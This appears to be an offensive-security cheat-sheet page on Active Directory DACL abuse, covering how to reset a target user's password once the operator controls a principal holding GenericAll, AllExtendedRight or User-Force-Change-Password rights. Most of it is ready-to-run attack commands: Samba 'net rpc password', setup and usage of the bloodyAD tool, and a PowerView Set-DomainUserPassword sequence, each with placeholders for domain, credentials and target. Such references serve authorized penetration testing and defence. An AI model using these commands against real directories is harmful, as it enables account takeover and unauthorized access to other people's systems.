PRIMARY CATEGORY → DACL ABUSE

This abuse can be carried out when an operator controls a principal which has GenericAll, AllExtendedRight or User-Force-Change-Password over the target account


Abuse - UNIX-like

Net RPC (Samba Suite)

Net RPC

RPC Authentication

net rpc password '<TARGET_ACCOUNT>' '<PASSWD>' -U '<DOMAIN>/<USER>%<PASSWD>' -S '<TARGET>'
BloodyAD

BloodyAD

LDAP Authentication

Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt
Usage
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' set password '<TARGET_ACCOUNT>' '<NEW_PASSWD>'

Abuse - Windows

Powerview

Powerview

Set-DomainUserPassword

$principalPasswd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$principalCred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $principalPasswd)
$targetPasswd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
Set-DomainUserPassword -Credential $principalCred -Identity '<TARGET_ACCOUNT>' -AccountPassword $targetPasswd 

Resources

The Hacker Recipes